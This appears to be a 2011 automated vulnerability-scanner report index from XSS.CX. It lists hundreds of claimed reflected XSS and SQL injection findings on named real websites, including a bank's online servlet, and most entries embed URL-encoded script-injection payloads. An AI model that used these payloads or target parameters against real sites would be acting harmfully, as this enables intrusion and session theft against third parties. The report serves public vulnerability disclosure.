XSS, Reflected Cross Site Scripting, CWE-79, CAPEC-86, DORK, GHDB, BHDB, 09272011-01

Report generated by XSS.CX at Tue Sep 27 09:04:17 CDT 2011.

Public Domain Vulnerability Information, Security Articles, Vulnerability Reports, GHDB, DORK Search

XSS Home | XSS Crawler | SQLi Crawler | HTTPi Crawler | FI Crawler |
Loading

1. SQL injection

1.1. https://hackalert.armorize.com/register.php/9f662%22%3E%3Cscript%3Ealert(document.location)%3C/_js/tooltips.js [name of an arbitrarily supplied request parameter]

1.2. https://hackalert.armorize.com/register.php/9f662%22%3E%3Cscript%3Ealert(document.location)%3C/images/icons/user.png [REST URL parameter 2]

2. Cross-site scripting (reflected)

2.1. http://api-public.addthis.com/url/shares.json [callback parameter]

2.2. http://as.vs4entertainment.com/ERA/era_rl.aspx [blockid parameter]

2.3. http://as.vs4entertainment.com/ERA/era_rl.aspx [elid parameter]

2.4. http://as.vs4entertainment.com/ERA/era_rl.aspx [eradomain parameter]

2.5. http://as.vs4entertainment.com/ERA/era_rl.aspx [name of an arbitrarily supplied request parameter]

2.6. http://as.vs4entertainment.com/ERA/era_rl.aspx [pubid parameter]

2.7. http://b.scorecardresearch.com/beacon.js [c1 parameter]

2.8. http://b.scorecardresearch.com/beacon.js [c10 parameter]

2.9. http://b.scorecardresearch.com/beacon.js [c15 parameter]

2.10. http://b.scorecardresearch.com/beacon.js [c2 parameter]

2.11. http://b.scorecardresearch.com/beacon.js [c3 parameter]

2.12. http://b.scorecardresearch.com/beacon.js [c4 parameter]

2.13. http://b.scorecardresearch.com/beacon.js [c5 parameter]

2.14. http://b.scorecardresearch.com/beacon.js [c6 parameter]

2.15. http://b3.mookie1.com/2/UndertoneB3/VolkswagenBTConq/11Q1/Tig_Out/300/1a8cf2cc3ea194958b161b3e3a0298236@x90 [REST URL parameter 2]

2.16. http://b3.mookie1.com/2/UndertoneB3/VolkswagenBTConq/11Q1/Tig_Out/300/1a8cf2cc3ea194958b161b3e3a0298236@x90 [REST URL parameter 3]

2.17. http://b3.mookie1.com/2/UndertoneB3/VolkswagenBTConq/11Q1/Tig_Out/300/1a8cf2cc3ea194958b161b3e3a0298236@x90 [REST URL parameter 4]

2.18. http://b3.mookie1.com/2/UndertoneB3/VolkswagenBTConq/11Q1/Tig_Out/300/1a8cf2cc3ea194958b161b3e3a0298236@x90 [REST URL parameter 5]

2.19. http://b3.mookie1.com/2/UndertoneB3/VolkswagenBTConq/11Q1/Tig_Out/300/1a8cf2cc3ea194958b161b3e3a0298236@x90 [REST URL parameter 6]

2.20. http://b3.mookie1.com/2/UndertoneB3/VolkswagenBTConq/11Q1/Tig_Out/300/1a8cf2cc3ea194958b161b3e3a0298236@x90 [REST URL parameter 7]

2.21. http://bid.openx.net/json [c parameter]

2.22. http://display.digitalriver.com/ [aid parameter]

2.23. http://display.digitalriver.com/ [name of an arbitrarily supplied request parameter]

2.24. http://display.digitalriver.com/ [tax parameter]

2.25. http://dm.de.mookie1.com/2/B3DM/2010DM/11185989978@x23 [REST URL parameter 2]

2.26. http://dm.de.mookie1.com/2/B3DM/2010DM/11185989978@x23 [REST URL parameter 3]

2.27. http://dm.de.mookie1.com/2/B3DM/2010DM/11185989978@x23 [REST URL parameter 4]

2.28. http://dm.de.mookie1.com/2/B3DM/2010DM/11185989978@x23 [USNetwork/VWBTC_11Q1_UT_Tig_Out_300 parameter]

2.29. http://dm.de.mookie1.com/2/B3DM/2010DM/11185989978@x23 [name of an arbitrarily supplied request parameter]

2.30. https://easywebsoc.tdcanadatrust.com/servlet/ca.tdbank.banking.servlet.DefaultServlet [FPL parameter]

2.31. http://embed.newsinc.com/TopPicks/embed.js [&wid parameter]

2.32. http://embed.newsinc.com/TopPicks/embed.js [cid parameter]

2.33. http://embed.newsinc.com/TopPicks/embed.js [freewheel parameter]

2.34. http://embed.newsinc.com/TopPicks/embed.js [parent parameter]

2.35. http://embed.newsinc.com/TopPicks/embed.js [sitesection parameter]

2.36. http://events.nydailynews.com/partner_json/search [image_size parameter]

2.37. http://events.nydailynews.com/partner_json/search [jsonsp parameter]

2.38. http://events.nydailynews.com/partner_json/search [limit parameter]

2.39. http://events.nydailynews.com/partner_json/search [st parameter]

2.40. http://events.nydailynews.com/partner_json/search [when parameter]

2.41. https://hackalert.armorize.com/register.php [name of an arbitrarily supplied request parameter]

2.42. https://hackalert.armorize.com/register.php [name of an arbitrarily supplied request parameter]

2.43. https://hackalert.armorize.com/register.php [pass parameter]

2.44. https://hackalert.armorize.com/register.php [pass_conf parameter]

2.45. https://hackalert.armorize.com/register.php/9f662%22%3E%3Cscript%3Ealert(document.location)%3C/_css/styleorange.css [REST URL parameter 2]

2.46. https://hackalert.armorize.com/register.php/9f662%22%3E%3Cscript%3Ealert(document.location)%3C/_css/styleorange.css [REST URL parameter 2]

2.47. https://hackalert.armorize.com/register.php/9f662%22%3E%3Cscript%3Ealert(document.location)%3C/_css/styleorange.css [REST URL parameter 2]

2.48. https://hackalert.armorize.com/register.php/9f662%22%3E%3Cscript%3Ealert(document.location)%3C/_css/styleorange.css [REST URL parameter 3]

2.49. https://hackalert.armorize.com/register.php/9f662%22%3E%3Cscript%3Ealert(document.location)%3C/_css/styleorange.css [REST URL parameter 3]

2.50. https://hackalert.armorize.com/register.php/9f662%22%3E%3Cscript%3Ealert(document.location)%3C/_css/styleorange.css [REST URL parameter 4]

2.51. https://hackalert.armorize.com/register.php/9f662%22%3E%3Cscript%3Ealert(document.location)%3C/_css/styleorange.css [REST URL parameter 4]

2.52. https://hackalert.armorize.com/register.php/9f662%22%3E%3Cscript%3Ealert(document.location)%3C/_js/ajaxInterface.js [REST URL parameter 2]

2.53. https://hackalert.armorize.com/register.php/9f662%22%3E%3Cscript%3Ealert(document.location)%3C/_js/ajaxInterface.js [REST URL parameter 2]

2.54. https://hackalert.armorize.com/register.php/9f662%22%3E%3Cscript%3Ealert(document.location)%3C/_js/ajaxInterface.js [REST URL parameter 2]

2.55. https://hackalert.armorize.com/register.php/9f662%22%3E%3Cscript%3Ealert(document.location)%3C/_js/ajaxInterface.js [REST URL parameter 3]

2.56. https://hackalert.armorize.com/register.php/9f662%22%3E%3Cscript%3Ealert(document.location)%3C/_js/ajaxInterface.js [REST URL parameter 3]

2.57. https://hackalert.armorize.com/register.php/9f662%22%3E%3Cscript%3Ealert(document.location)%3C/_js/ajaxInterface.js [REST URL parameter 4]

2.58. https://hackalert.armorize.com/register.php/9f662%22%3E%3Cscript%3Ealert(document.location)%3C/_js/ajaxInterface.js [REST URL parameter 4]

2.59. https://hackalert.armorize.com/register.php/9f662%22%3E%3Cscript%3Ealert(document.location)%3C/_js/datepicker.js [REST URL parameter 2]

2.60. https://hackalert.armorize.com/register.php/9f662%22%3E%3Cscript%3Ealert(document.location)%3C/_js/datepicker.js [REST URL parameter 2]

2.61. https://hackalert.armorize.com/register.php/9f662%22%3E%3Cscript%3Ealert(document.location)%3C/_js/datepicker.js [REST URL parameter 2]

2.62. https://hackalert.armorize.com/register.php/9f662%22%3E%3Cscript%3Ealert(document.location)%3C/_js/datepicker.js [REST URL parameter 3]

2.63. https://hackalert.armorize.com/register.php/9f662%22%3E%3Cscript%3Ealert(document.location)%3C/_js/datepicker.js [REST URL parameter 3]

2.64. https://hackalert.armorize.com/register.php/9f662%22%3E%3Cscript%3Ealert(document.location)%3C/_js/datepicker.js [REST URL parameter 4]

2.65. https://hackalert.armorize.com/register.php/9f662%22%3E%3Cscript%3Ealert(document.location)%3C/_js/datepicker.js [REST URL parameter 4]

2.66. https://hackalert.armorize.com/register.php/9f662%22%3E%3Cscript%3Ealert(document.location)%3C/_js/doFx.js [REST URL parameter 2]

2.67. https://hackalert.armorize.com/register.php/9f662%22%3E%3Cscript%3Ealert(document.location)%3C/_js/doFx.js [REST URL parameter 2]

2.68. https://hackalert.armorize.com/register.php/9f662%22%3E%3Cscript%3Ealert(document.location)%3C/_js/doFx.js [REST URL parameter 2]

2.69. https://hackalert.armorize.com/register.php/9f662%22%3E%3Cscript%3Ealert(document.location)%3C/_js/doFx.js [REST URL parameter 3]

2.70. https://hackalert.armorize.com/register.php/9f662%22%3E%3Cscript%3Ealert(document.location)%3C/_js/doFx.js [REST URL parameter 3]

2.71. https://hackalert.armorize.com/register.php/9f662%22%3E%3Cscript%3Ealert(document.location)%3C/_js/doFx.js [REST URL parameter 4]

2.72. https://hackalert.armorize.com/register.php/9f662%22%3E%3Cscript%3Ealert(document.location)%3C/_js/doFx.js [REST URL parameter 4]

2.73. https://hackalert.armorize.com/register.php/9f662%22%3E%3Cscript%3Ealert(document.location)%3C/_js/dom-drag.js [REST URL parameter 2]

2.74. https://hackalert.armorize.com/register.php/9f662%22%3E%3Cscript%3Ealert(document.location)%3C/_js/dom-drag.js [REST URL parameter 2]

2.75. https://hackalert.armorize.com/register.php/9f662%22%3E%3Cscript%3Ealert(document.location)%3C/_js/dom-drag.js [REST URL parameter 2]

2.76. https://hackalert.armorize.com/register.php/9f662%22%3E%3Cscript%3Ealert(document.location)%3C/_js/dom-drag.js [REST URL parameter 3]

2.77. https://hackalert.armorize.com/register.php/9f662%22%3E%3Cscript%3Ealert(document.location)%3C/_js/dom-drag.js [REST URL parameter 3]

2.78. https://hackalert.armorize.com/register.php/9f662%22%3E%3Cscript%3Ealert(document.location)%3C/_js/dom-drag.js [REST URL parameter 4]

2.79. https://hackalert.armorize.com/register.php/9f662%22%3E%3Cscript%3Ealert(document.location)%3C/_js/dom-drag.js [REST URL parameter 4]

2.80. https://hackalert.armorize.com/register.php/9f662%22%3E%3Cscript%3Ealert(document.location)%3C/_js/mootools.v1.11.js [REST URL parameter 2]

2.81. https://hackalert.armorize.com/register.php/9f662%22%3E%3Cscript%3Ealert(document.location)%3C/_js/mootools.v1.11.js [REST URL parameter 2]

2.82. https://hackalert.armorize.com/register.php/9f662%22%3E%3Cscript%3Ealert(document.location)%3C/_js/mootools.v1.11.js [REST URL parameter 2]

2.83. https://hackalert.armorize.com/register.php/9f662%22%3E%3Cscript%3Ealert(document.location)%3C/_js/mootools.v1.11.js [REST URL parameter 3]

2.84. https://hackalert.armorize.com/register.php/9f662%22%3E%3Cscript%3Ealert(document.location)%3C/_js/mootools.v1.11.js [REST URL parameter 3]

2.85. https://hackalert.armorize.com/register.php/9f662%22%3E%3Cscript%3Ealert(document.location)%3C/_js/mootools.v1.11.js [REST URL parameter 4]

2.86. https://hackalert.armorize.com/register.php/9f662%22%3E%3Cscript%3Ealert(document.location)%3C/_js/mootools.v1.11.js [REST URL parameter 4]

2.87. https://hackalert.armorize.com/register.php/9f662%22%3E%3Cscript%3Ealert(document.location)%3C/_js/rc_lang_en.js [REST URL parameter 2]

2.88. https://hackalert.armorize.com/register.php/9f662%22%3E%3Cscript%3Ealert(document.location)%3C/_js/rc_lang_en.js [REST URL parameter 2]

2.89. https://hackalert.armorize.com/register.php/9f662%22%3E%3Cscript%3Ealert(document.location)%3C/_js/rc_lang_en.js [REST URL parameter 2]

2.90. https://hackalert.armorize.com/register.php/9f662%22%3E%3Cscript%3Ealert(document.location)%3C/_js/rc_lang_en.js [REST URL parameter 3]

2.91. https://hackalert.armorize.com/register.php/9f662%22%3E%3Cscript%3Ealert(document.location)%3C/_js/rc_lang_en.js [REST URL parameter 3]

2.92. https://hackalert.armorize.com/register.php/9f662%22%3E%3Cscript%3Ealert(document.location)%3C/_js/rc_lang_en.js [REST URL parameter 4]

2.93. https://hackalert.armorize.com/register.php/9f662%22%3E%3Cscript%3Ealert(document.location)%3C/_js/rc_lang_en.js [REST URL parameter 4]

2.94. https://hackalert.armorize.com/register.php/9f662%22%3E%3Cscript%3Ealert(document.location)%3C/_js/register.js [REST URL parameter 2]

2.95. https://hackalert.armorize.com/register.php/9f662%22%3E%3Cscript%3Ealert(document.location)%3C/_js/register.js [REST URL parameter 2]

2.96. https://hackalert.armorize.com/register.php/9f662%22%3E%3Cscript%3Ealert(document.location)%3C/_js/register.js [REST URL parameter 2]

2.97. https://hackalert.armorize.com/register.php/9f662%22%3E%3Cscript%3Ealert(document.location)%3C/_js/register.js [REST URL parameter 3]

2.98. https://hackalert.armorize.com/register.php/9f662%22%3E%3Cscript%3Ealert(document.location)%3C/_js/register.js [REST URL parameter 3]

2.99. https://hackalert.armorize.com/register.php/9f662%22%3E%3Cscript%3Ealert(document.location)%3C/_js/register.js [REST URL parameter 4]

2.100. https://hackalert.armorize.com/register.php/9f662%22%3E%3Cscript%3Ealert(document.location)%3C/_js/register.js [REST URL parameter 4]

2.101. https://hackalert.armorize.com/register.php/9f662%22%3E%3Cscript%3Ealert(document.location)%3C/_js/rich_calendar.js [REST URL parameter 2]

2.102. https://hackalert.armorize.com/register.php/9f662%22%3E%3Cscript%3Ealert(document.location)%3C/_js/rich_calendar.js [REST URL parameter 2]

2.103. https://hackalert.armorize.com/register.php/9f662%22%3E%3Cscript%3Ealert(document.location)%3C/_js/rich_calendar.js [REST URL parameter 2]

2.104. https://hackalert.armorize.com/register.php/9f662%22%3E%3Cscript%3Ealert(document.location)%3C/_js/rich_calendar.js [REST URL parameter 3]

2.105. https://hackalert.armorize.com/register.php/9f662%22%3E%3Cscript%3Ealert(document.location)%3C/_js/rich_calendar.js [REST URL parameter 3]

2.106. https://hackalert.armorize.com/register.php/9f662%22%3E%3Cscript%3Ealert(document.location)%3C/_js/rich_calendar.js [REST URL parameter 4]

2.107. https://hackalert.armorize.com/register.php/9f662%22%3E%3Cscript%3Ealert(document.location)%3C/_js/rich_calendar.js [REST URL parameter 4]

2.108. https://hackalert.armorize.com/register.php/9f662%22%3E%3Cscript%3Ealert(document.location)%3C/_js/tooltips.js [REST URL parameter 2]

2.109. https://hackalert.armorize.com/register.php/9f662%22%3E%3Cscript%3Ealert(document.location)%3C/_js/tooltips.js [REST URL parameter 2]

2.110. https://hackalert.armorize.com/register.php/9f662%22%3E%3Cscript%3Ealert(document.location)%3C/_js/tooltips.js [REST URL parameter 2]

2.111. https://hackalert.armorize.com/register.php/9f662%22%3E%3Cscript%3Ealert(document.location)%3C/_js/tooltips.js [REST URL parameter 3]

2.112. https://hackalert.armorize.com/register.php/9f662%22%3E%3Cscript%3Ealert(document.location)%3C/_js/tooltips.js [REST URL parameter 3]

2.113. https://hackalert.armorize.com/register.php/9f662%22%3E%3Cscript%3Ealert(document.location)%3C/_js/tooltips.js [REST URL parameter 4]

2.114. https://hackalert.armorize.com/register.php/9f662%22%3E%3Cscript%3Ealert(document.location)%3C/_js/tooltips.js [REST URL parameter 4]

2.115. https://hackalert.armorize.com/register.php/9f662%22%3E%3Cscript%3Ealert(document.location)%3C/_js/usersettings.js [REST URL parameter 2]

2.116. https://hackalert.armorize.com/register.php/9f662%22%3E%3Cscript%3Ealert(document.location)%3C/_js/usersettings.js [REST URL parameter 2]

2.117. https://hackalert.armorize.com/register.php/9f662%22%3E%3Cscript%3Ealert(document.location)%3C/_js/usersettings.js [REST URL parameter 2]

2.118. https://hackalert.armorize.com/register.php/9f662%22%3E%3Cscript%3Ealert(document.location)%3C/_js/usersettings.js [REST URL parameter 3]

2.119. https://hackalert.armorize.com/register.php/9f662%22%3E%3Cscript%3Ealert(document.location)%3C/_js/usersettings.js [REST URL parameter 3]

2.120. https://hackalert.armorize.com/register.php/9f662%22%3E%3Cscript%3Ealert(document.location)%3C/_js/usersettings.js [REST URL parameter 4]

2.121. https://hackalert.armorize.com/register.php/9f662%22%3E%3Cscript%3Ealert(document.location)%3C/_js/usersettings.js [REST URL parameter 4]

2.122. https://hackalert.armorize.com/register.php/9f662%22%3E%3Cscript%3Ealert(document.location)%3C/_js/windowFx.js [REST URL parameter 2]

2.123. https://hackalert.armorize.com/register.php/9f662%22%3E%3Cscript%3Ealert(document.location)%3C/_js/windowFx.js [REST URL parameter 2]

2.124. https://hackalert.armorize.com/register.php/9f662%22%3E%3Cscript%3Ealert(document.location)%3C/_js/windowFx.js [REST URL parameter 2]

2.125. https://hackalert.armorize.com/register.php/9f662%22%3E%3Cscript%3Ealert(document.location)%3C/_js/windowFx.js [REST URL parameter 3]

2.126. https://hackalert.armorize.com/register.php/9f662%22%3E%3Cscript%3Ealert(document.location)%3C/_js/windowFx.js [REST URL parameter 3]

2.127. https://hackalert.armorize.com/register.php/9f662%22%3E%3Cscript%3Ealert(document.location)%3C/_js/windowFx.js [REST URL parameter 4]

2.128. https://hackalert.armorize.com/register.php/9f662%22%3E%3Cscript%3Ealert(document.location)%3C/_js/windowFx.js [REST URL parameter 4]

2.129. https://hackalert.armorize.com/register.php/9f662%22%3E%3Cscript%3Ealert(document.location)%3C/favicon.ico [REST URL parameter 2]

2.130. https://hackalert.armorize.com/register.php/9f662%22%3E%3Cscript%3Ealert(document.location)%3C/favicon.ico [REST URL parameter 2]

2.131. https://hackalert.armorize.com/register.php/9f662%22%3E%3Cscript%3Ealert(document.location)%3C/favicon.ico [REST URL parameter 2]

2.132. https://hackalert.armorize.com/register.php/9f662%22%3E%3Cscript%3Ealert(document.location)%3C/favicon.ico [REST URL parameter 3]

2.133. https://hackalert.armorize.com/register.php/9f662%22%3E%3Cscript%3Ealert(document.location)%3C/favicon.ico [REST URL parameter 3]

2.134. https://hackalert.armorize.com/register.php/9f662%22%3E%3Cscript%3Ealert(document.location)%3C/images/ajaxStatus/loading.gif [REST URL parameter 2]

2.135. https://hackalert.armorize.com/register.php/9f662%22%3E%3Cscript%3Ealert(document.location)%3C/images/ajaxStatus/loading.gif [REST URL parameter 2]

2.136. https://hackalert.armorize.com/register.php/9f662%22%3E%3Cscript%3Ealert(document.location)%3C/images/ajaxStatus/loading.gif [REST URL parameter 2]

2.137. https://hackalert.armorize.com/register.php/9f662%22%3E%3Cscript%3Ealert(document.location)%3C/images/ajaxStatus/loading.gif [REST URL parameter 3]

2.138. https://hackalert.armorize.com/register.php/9f662%22%3E%3Cscript%3Ealert(document.location)%3C/images/ajaxStatus/loading.gif [REST URL parameter 3]

2.139. https://hackalert.armorize.com/register.php/9f662%22%3E%3Cscript%3Ealert(document.location)%3C/images/ajaxStatus/loading.gif [REST URL parameter 4]

2.140. https://hackalert.armorize.com/register.php/9f662%22%3E%3Cscript%3Ealert(document.location)%3C/images/ajaxStatus/loading.gif [REST URL parameter 4]

2.141. https://hackalert.armorize.com/register.php/9f662%22%3E%3Cscript%3Ealert(document.location)%3C/images/ajaxStatus/loading.gif [REST URL parameter 5]

2.142. https://hackalert.armorize.com/register.php/9f662%22%3E%3Cscript%3Ealert(document.location)%3C/images/ajaxStatus/loading.gif [REST URL parameter 5]

2.143. https://hackalert.armorize.com/register.php/9f662%22%3E%3Cscript%3Ealert(document.location)%3C/images/captcha.php [REST URL parameter 2]

2.144. https://hackalert.armorize.com/register.php/9f662%22%3E%3Cscript%3Ealert(document.location)%3C/images/captcha.php [REST URL parameter 2]

2.145. https://hackalert.armorize.com/register.php/9f662%22%3E%3Cscript%3Ealert(document.location)%3C/images/captcha.php [REST URL parameter 2]

2.146. https://hackalert.armorize.com/register.php/9f662%22%3E%3Cscript%3Ealert(document.location)%3C/images/captcha.php [REST URL parameter 3]

2.147. https://hackalert.armorize.com/register.php/9f662%22%3E%3Cscript%3Ealert(document.location)%3C/images/captcha.php [REST URL parameter 3]

2.148. https://hackalert.armorize.com/register.php/9f662%22%3E%3Cscript%3Ealert(document.location)%3C/images/captcha.php [REST URL parameter 4]

2.149. https://hackalert.armorize.com/register.php/9f662%22%3E%3Cscript%3Ealert(document.location)%3C/images/captcha.php [REST URL parameter 4]

2.150. https://hackalert.armorize.com/register.php/9f662%22%3E%3Cscript%3Ealert(document.location)%3C/images/captcha.php [name of an arbitrarily supplied request parameter]

2.151. https://hackalert.armorize.com/register.php/9f662%22%3E%3Cscript%3Ealert(document.location)%3C/images/captcha.php [name of an arbitrarily supplied request parameter]

2.152. https://hackalert.armorize.com/register.php/9f662%22%3E%3Cscript%3Ealert(document.location)%3C/images/flags/gif/jp.gif [REST URL parameter 2]

2.153. https://hackalert.armorize.com/register.php/9f662%22%3E%3Cscript%3Ealert(document.location)%3C/images/flags/gif/jp.gif [REST URL parameter 2]

2.154. https://hackalert.armorize.com/register.php/9f662%22%3E%3Cscript%3Ealert(document.location)%3C/images/flags/gif/jp.gif [REST URL parameter 2]

2.155. https://hackalert.armorize.com/register.php/9f662%22%3E%3Cscript%3Ealert(document.location)%3C/images/flags/gif/jp.gif [REST URL parameter 3]

2.156. https://hackalert.armorize.com/register.php/9f662%22%3E%3Cscript%3Ealert(document.location)%3C/images/flags/gif/jp.gif [REST URL parameter 3]

2.157. https://hackalert.armorize.com/register.php/9f662%22%3E%3Cscript%3Ealert(document.location)%3C/images/flags/gif/jp.gif [REST URL parameter 4]

2.158. https://hackalert.armorize.com/register.php/9f662%22%3E%3Cscript%3Ealert(document.location)%3C/images/flags/gif/jp.gif [REST URL parameter 4]

2.159. https://hackalert.armorize.com/register.php/9f662%22%3E%3Cscript%3Ealert(document.location)%3C/images/flags/gif/jp.gif [REST URL parameter 5]

2.160. https://hackalert.armorize.com/register.php/9f662%22%3E%3Cscript%3Ealert(document.location)%3C/images/flags/gif/jp.gif [REST URL parameter 5]

2.161. https://hackalert.armorize.com/register.php/9f662%22%3E%3Cscript%3Ealert(document.location)%3C/images/flags/gif/jp.gif [REST URL parameter 6]

2.162. https://hackalert.armorize.com/register.php/9f662%22%3E%3Cscript%3Ealert(document.location)%3C/images/flags/gif/jp.gif [REST URL parameter 6]

2.163. https://hackalert.armorize.com/register.php/9f662%22%3E%3Cscript%3Ealert(document.location)%3C/images/i.gif [REST URL parameter 2]

2.164. https://hackalert.armorize.com/register.php/9f662%22%3E%3Cscript%3Ealert(document.location)%3C/images/i.gif [REST URL parameter 2]

2.165. https://hackalert.armorize.com/register.php/9f662%22%3E%3Cscript%3Ealert(document.location)%3C/images/i.gif [REST URL parameter 2]

2.166. https://hackalert.armorize.com/register.php/9f662%22%3E%3Cscript%3Ealert(document.location)%3C/images/i.gif [REST URL parameter 3]

2.167. https://hackalert.armorize.com/register.php/9f662%22%3E%3Cscript%3Ealert(document.location)%3C/images/i.gif [REST URL parameter 3]

2.168. https://hackalert.armorize.com/register.php/9f662%22%3E%3Cscript%3Ealert(document.location)%3C/images/i.gif [REST URL parameter 4]

2.169. https://hackalert.armorize.com/register.php/9f662%22%3E%3Cscript%3Ealert(document.location)%3C/images/i.gif [REST URL parameter 4]

2.170. https://hackalert.armorize.com/register.php/9f662%22%3E%3Cscript%3Ealert(document.location)%3C/images/icons/accept.png [REST URL parameter 2]

2.171. https://hackalert.armorize.com/register.php/9f662%22%3E%3Cscript%3Ealert(document.location)%3C/images/icons/accept.png [REST URL parameter 2]

2.172. https://hackalert.armorize.com/register.php/9f662%22%3E%3Cscript%3Ealert(document.location)%3C/images/icons/accept.png [REST URL parameter 2]

2.173. https://hackalert.armorize.com/register.php/9f662%22%3E%3Cscript%3Ealert(document.location)%3C/images/icons/accept.png [REST URL parameter 3]

2.174. https://hackalert.armorize.com/register.php/9f662%22%3E%3Cscript%3Ealert(document.location)%3C/images/icons/accept.png [REST URL parameter 3]

2.175. https://hackalert.armorize.com/register.php/9f662%22%3E%3Cscript%3Ealert(document.location)%3C/images/icons/accept.png [REST URL parameter 4]

2.176. https://hackalert.armorize.com/register.php/9f662%22%3E%3Cscript%3Ealert(document.location)%3C/images/icons/accept.png [REST URL parameter 4]

2.177. https://hackalert.armorize.com/register.php/9f662%22%3E%3Cscript%3Ealert(document.location)%3C/images/icons/accept.png [REST URL parameter 5]

2.178. https://hackalert.armorize.com/register.php/9f662%22%3E%3Cscript%3Ealert(document.location)%3C/images/icons/accept.png [REST URL parameter 5]

2.179. https://hackalert.armorize.com/register.php/9f662%22%3E%3Cscript%3Ealert(document.location)%3C/images/icons/bullet_orange.png [REST URL parameter 2]

2.180. https://hackalert.armorize.com/register.php/9f662%22%3E%3Cscript%3Ealert(document.location)%3C/images/icons/bullet_orange.png [REST URL parameter 2]

2.181. https://hackalert.armorize.com/register.php/9f662%22%3E%3Cscript%3Ealert(document.location)%3C/images/icons/bullet_orange.png [REST URL parameter 2]

2.182. https://hackalert.armorize.com/register.php/9f662%22%3E%3Cscript%3Ealert(document.location)%3C/images/icons/bullet_orange.png [REST URL parameter 3]

2.183. https://hackalert.armorize.com/register.php/9f662%22%3E%3Cscript%3Ealert(document.location)%3C/images/icons/bullet_orange.png [REST URL parameter 3]

2.184. https://hackalert.armorize.com/register.php/9f662%22%3E%3Cscript%3Ealert(document.location)%3C/images/icons/bullet_orange.png [REST URL parameter 4]

2.185. https://hackalert.armorize.com/register.php/9f662%22%3E%3Cscript%3Ealert(document.location)%3C/images/icons/bullet_orange.png [REST URL parameter 4]

2.186. https://hackalert.armorize.com/register.php/9f662%22%3E%3Cscript%3Ealert(document.location)%3C/images/icons/bullet_orange.png [REST URL parameter 5]

2.187. https://hackalert.armorize.com/register.php/9f662%22%3E%3Cscript%3Ealert(document.location)%3C/images/icons/bullet_orange.png [REST URL parameter 5]

2.188. https://hackalert.armorize.com/register.php/9f662%22%3E%3Cscript%3Ealert(document.location)%3C/images/icons/cross.png [REST URL parameter 2]

2.189. https://hackalert.armorize.com/register.php/9f662%22%3E%3Cscript%3Ealert(document.location)%3C/images/icons/cross.png [REST URL parameter 2]

2.190. https://hackalert.armorize.com/register.php/9f662%22%3E%3Cscript%3Ealert(document.location)%3C/images/icons/cross.png [REST URL parameter 2]

2.191. https://hackalert.armorize.com/register.php/9f662%22%3E%3Cscript%3Ealert(document.location)%3C/images/icons/cross.png [REST URL parameter 3]

2.192. https://hackalert.armorize.com/register.php/9f662%22%3E%3Cscript%3Ealert(document.location)%3C/images/icons/cross.png [REST URL parameter 3]

2.193. https://hackalert.armorize.com/register.php/9f662%22%3E%3Cscript%3Ealert(document.location)%3C/images/icons/cross.png [REST URL parameter 4]

2.194. https://hackalert.armorize.com/register.php/9f662%22%3E%3Cscript%3Ealert(document.location)%3C/images/icons/cross.png [REST URL parameter 4]

2.195. https://hackalert.armorize.com/register.php/9f662%22%3E%3Cscript%3Ealert(document.location)%3C/images/icons/cross.png [REST URL parameter 5]

2.196. https://hackalert.armorize.com/register.php/9f662%22%3E%3Cscript%3Ealert(document.location)%3C/images/icons/cross.png [REST URL parameter 5]

2.197. https://hackalert.armorize.com/register.php/9f662%22%3E%3Cscript%3Ealert(document.location)%3C/images/icons/exclamation.png [REST URL parameter 2]

2.198. https://hackalert.armorize.com/register.php/9f662%22%3E%3Cscript%3Ealert(document.location)%3C/images/icons/exclamation.png [REST URL parameter 2]

2.199. https://hackalert.armorize.com/register.php/9f662%22%3E%3Cscript%3Ealert(document.location)%3C/images/icons/exclamation.png [REST URL parameter 2]

2.200. https://hackalert.armorize.com/register.php/9f662%22%3E%3Cscript%3Ealert(document.location)%3C/images/icons/exclamation.png [REST URL parameter 3]

2.201. https://hackalert.armorize.com/register.php/9f662%22%3E%3Cscript%3Ealert(document.location)%3C/images/icons/exclamation.png [REST URL parameter 3]

2.202. https://hackalert.armorize.com/register.php/9f662%22%3E%3Cscript%3Ealert(document.location)%3C/images/icons/exclamation.png [REST URL parameter 4]

2.203. https://hackalert.armorize.com/register.php/9f662%22%3E%3Cscript%3Ealert(document.location)%3C/images/icons/exclamation.png [REST URL parameter 4]

2.204. https://hackalert.armorize.com/register.php/9f662%22%3E%3Cscript%3Ealert(document.location)%3C/images/icons/exclamation.png [REST URL parameter 5]

2.205. https://hackalert.armorize.com/register.php/9f662%22%3E%3Cscript%3Ealert(document.location)%3C/images/icons/exclamation.png [REST URL parameter 5]

2.206. https://hackalert.armorize.com/register.php/9f662%22%3E%3Cscript%3Ealert(document.location)%3C/images/icons/key_go.png [REST URL parameter 2]

2.207. https://hackalert.armorize.com/register.php/9f662%22%3E%3Cscript%3Ealert(document.location)%3C/images/icons/key_go.png [REST URL parameter 2]

2.208. https://hackalert.armorize.com/register.php/9f662%22%3E%3Cscript%3Ealert(document.location)%3C/images/icons/key_go.png [REST URL parameter 2]

2.209. https://hackalert.armorize.com/register.php/9f662%22%3E%3Cscript%3Ealert(document.location)%3C/images/icons/key_go.png [REST URL parameter 3]

2.210. https://hackalert.armorize.com/register.php/9f662%22%3E%3Cscript%3Ealert(document.location)%3C/images/icons/key_go.png [REST URL parameter 3]

2.211. https://hackalert.armorize.com/register.php/9f662%22%3E%3Cscript%3Ealert(document.location)%3C/images/icons/key_go.png [REST URL parameter 4]

2.212. https://hackalert.armorize.com/register.php/9f662%22%3E%3Cscript%3Ealert(document.location)%3C/images/icons/key_go.png [REST URL parameter 4]

2.213. https://hackalert.armorize.com/register.php/9f662%22%3E%3Cscript%3Ealert(document.location)%3C/images/icons/key_go.png [REST URL parameter 5]

2.214. https://hackalert.armorize.com/register.php/9f662%22%3E%3Cscript%3Ealert(document.location)%3C/images/icons/key_go.png [REST URL parameter 5]

2.215. https://hackalert.armorize.com/register.php/9f662%22%3E%3Cscript%3Ealert(document.location)%3C/images/icons/tick.png [REST URL parameter 2]

2.216. https://hackalert.armorize.com/register.php/9f662%22%3E%3Cscript%3Ealert(document.location)%3C/images/icons/tick.png [REST URL parameter 2]

2.217. https://hackalert.armorize.com/register.php/9f662%22%3E%3Cscript%3Ealert(document.location)%3C/images/icons/tick.png [REST URL parameter 2]

2.218. https://hackalert.armorize.com/register.php/9f662%22%3E%3Cscript%3Ealert(document.location)%3C/images/icons/tick.png [REST URL parameter 3]

2.219. https://hackalert.armorize.com/register.php/9f662%22%3E%3Cscript%3Ealert(document.location)%3C/images/icons/tick.png [REST URL parameter 3]

2.220. https://hackalert.armorize.com/register.php/9f662%22%3E%3Cscript%3Ealert(document.location)%3C/images/icons/tick.png [REST URL parameter 4]

